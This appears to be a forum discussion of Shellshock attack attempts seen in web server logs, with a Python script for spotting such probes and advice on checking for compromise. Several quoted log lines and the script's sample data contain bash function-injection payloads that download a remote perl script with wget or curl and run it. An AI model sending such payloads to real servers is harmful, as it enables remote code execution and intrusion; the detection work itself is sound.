
Thanks for the idea. Looks like there is someone out there already trying to download and install remote shells:

    access.log:89.207.135.125 - - [25/Sep/2014:12:30:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 169 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
    access.log:146.71.113.194 - - [26/Sep/2014:00:26:04 +0000] "GET /cgi-bin/helpme HTTP/1.0" 302 169 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"
    access.log:146.71.113.194 - - [26/Sep/2014:00:26:05 +0000] "GET /cgi-bin/helpme HTTP/1.0" 404 13272 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"

Any suggestions on how to best check if they succeeded? I think I'm safe as I upgraded Ubuntu Bash right after the announcement, and run Nginx+uWSGI instead of Apache with CGI enabled. But Nginx might set some environment variables somewhere as well.
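
One way to triage log entries like the ones quoted above, as an added example that is not part of the original comments: it flags any logged field containing a bash function definition (`() {`), decodes nginx's `\x22` escapes, and extracts the trailing command plus any download URLs to look for on disk. The sample lines are constructed with documentation addresses, and the function name `find_shellshock_probes` is hypothetical.

```python
import re

# Combined log format, optionally prefixed by a grep filename such as "access.log:".
QUOTED = r'"((?:[^"\\]|\\.)*)"'  # quoted field; tolerates \x22 and \" escapes
LINE_RE = re.compile(
    r'^(?:[^\s:]+\.log[^\s:]*:)?(\S+) \S+ \S+ \[([^\]]+)\] '
    + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)
MARKER_RE = re.compile(r'\(\s*\)\s*\{')        # start of a bash function definition
HEX_RE = re.compile(r'\\x([0-9A-Fa-f]{2})')    # nginx-style \xNN escapes
URL_RE = re.compile(r'https?://[^\s;"\']+')


def find_shellshock_probes(lines):
    """Return one record per log line carrying a '() {' value in a logged field."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ip, when, request, status, referer, agent = m.groups()
        for name, raw in (("request", request), ("referer", referer), ("user-agent", agent)):
            value = HEX_RE.sub(lambda h: chr(int(h.group(1), 16)), raw)
            marker = MARKER_RE.search(value)
            if not marker:
                continue
            # Text after the function body's closing brace is what a vulnerable bash would run.
            command = value[marker.end():].partition("}")[2].lstrip("; ")
            parts = request.split()
            hits.append({
                "ip": ip, "time": when, "status": int(status),
                "path": parts[1] if len(parts) > 1 else request,
                "field": name, "command": command,
                "urls": sorted(set(URL_RE.findall(command))),
            })
            break  # one record per line is enough
    return hits


# Constructed sample lines (documentation addresses, not taken from any real log).
SAMPLE = r'''
access.log:192.0.2.10 - - [25/Sep/2014:12:30:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 169 "-" "() { :;}; /bin/ping -c 1 198.51.100.7"
access.log:192.0.2.20 - - [26/Sep/2014:00:26:05 +0000] "GET /cgi-bin/helpme HTTP/1.0" 404 13272 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://203.0.113.5/payload;perl /tmp/payload\x22"
access.log:192.0.2.30 - - [26/Sep/2014:00:27:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''.strip().splitlines()

if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE):
        print(hit["time"], hit["ip"], hit["status"], hit["path"], "->", hit["command"], hit["urls"])
```

The HTTP status in each record only shows how the web server answered the request; it does not say whether the trailing command ran.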


I saw a similar thing in my Apache log. I shut the machine down. I will check for changed files via `find` http://xmodulo.com/how-to-find-recently-modified-files-on-li... when I get the chance.



